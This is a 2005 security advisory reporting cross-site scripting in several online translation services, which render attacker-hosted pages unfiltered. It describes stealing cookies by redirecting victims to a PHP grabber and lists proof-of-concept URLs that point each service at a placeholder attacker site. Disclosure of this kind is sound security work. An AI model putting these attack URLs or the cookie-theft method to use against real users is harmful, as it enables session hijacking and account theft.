Title: Multiple Translation websites Cross Site Scripting vulnerability Author: Simo Ben youssef aka _6mO_HaCk Date: 22 December 2005 MorX Security Research Team http://www.morx.org Service: Translation tools/websites Vendors: Google, altavista, IBM, freetranslation, worldlingo paralink and almost any site using the webpage translation technique Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks Tested on: Microsoft IE 6.0 and firefox 5.1 (should work on all browsers) Details: the following is a Cross Site Scripting vulnerability that i ve found so far in all translation websites that i ve seen, these websites use URL webpage translation method which consist of passing a url of a user choice to the web application for translating purpose, in fact after the webpage is being processed (translated) the application dosent filter the webpage content before outputing it into the user browser. Impact: a remote attacker can construct a malicious code in a webpage then upload it to his/her webserver and make a vulnerable website user visit the page thru the translation script and therefor execute the malicious code contents by the client browser. malicous code as an example can be a javascript code to steal the victim cookie exemple of a malicious webpage: this javascript code will redirect the victim to the attacker php script to grab the cookie information and then log it or/and send it back the the attacker email exemple of a php grabber for testing purpose you may use the following javascript Proof Of Concept Exploits: The following list is just a very small list of many vulnerable websites paralink: http://webtranslation.paralink.com/webtranslation.asp?clientid=default&appid=default&b=1&dir=en/fr&dic=general&extsvr=&auto=1&url=http://www.attacker-site/malicious-code.html Google: http://translate.google.com/translate?u=http://www.attacker-site/malicious-code.html Freetranslation: http://fets3.freetranslation.com/?Url=http%3A%2F%2Fwww.attacker-site.com%2Fmalicious-code.html&Language=English%2FSpanish&Sequence=core Altavista: http://babelfish.altavista.com/babelfish/urltrurl?tt=url&url=http://www.attacker-site/malicious-code.html&lp=zh_en IBM: http://www.alphaworks.ibm.com/aw.nsf/html/mt http://192.195.29.104/demand?mtlang=enfr&translate=http%253A%252F%252Fwww.attacker-site%252Fmalicious-code.html Worldlingo: http://www.worldlingo.com/wl/services/S221S1U3QrQ4rVX1J4x4O5WifQlI6nxpL/translation?wl_trglang=DE&wl_rurl=http%3A%2F%2Fwww.attacker-site.com&wl_url=http%3A%2F%2Fwww.attacker-site.com%2Fmalicious-code.html Comprendium: http://www.comprendium.es/index_demo_text_ca.html online-translator: http://www.online-translator.com/url/tran_url.asp?lang=en&url=http%3A%2F%2Fwww.attacker-site.com%2Fmalicious-code.html&direction=er&template=General&cp1=NO&cp2=NO&autotranslate=on&transliterate=on&psubmit2.x=44&psubmit2.y=12 systranbox: http://www.systranbox.com/systran/box ... and more screen captures demonstrating the vulnerabilities: www.morx.org/altavista.JPG www.morx.org/altavista2.JPG www.morx.org/google.JPG www.morx.org/worldlingo.JPG www.morx.org/worldlingo2.JPG www.morx.org/freetranslation.JPG www.morx.org/freetranslation2.JPG www.morx.org/paralink.JPG www.morx.org/paralink2.JPG www.morx.org/online-translator.JPG www.morx.org/ibm.JPG www.morx.org/comprendium.JPG www.morx.org/systran.JPG Disclaimer: this entire document is for eductional purposes and testing only. Modification use and/or publishing this information is entirely on your OWN risk, I cannot be held responsible for any of the above Most of the vendors were already contacted and informed about these problems, some confirmed some didnt answer back and some werent contacted because i couldnt find their contact information. My x-mas wish: petit papa noel quand tu decendra du ciel avec tes cadeaux par milier n oubli pas de foutre une bi** dans le cu* a Abder (je t aime quand meme) :D Greets: Special Greets and Thanks to HandriX and all MorX members, Securma Massine and Anasoft. greets to my brother in fuxoring Abder :> --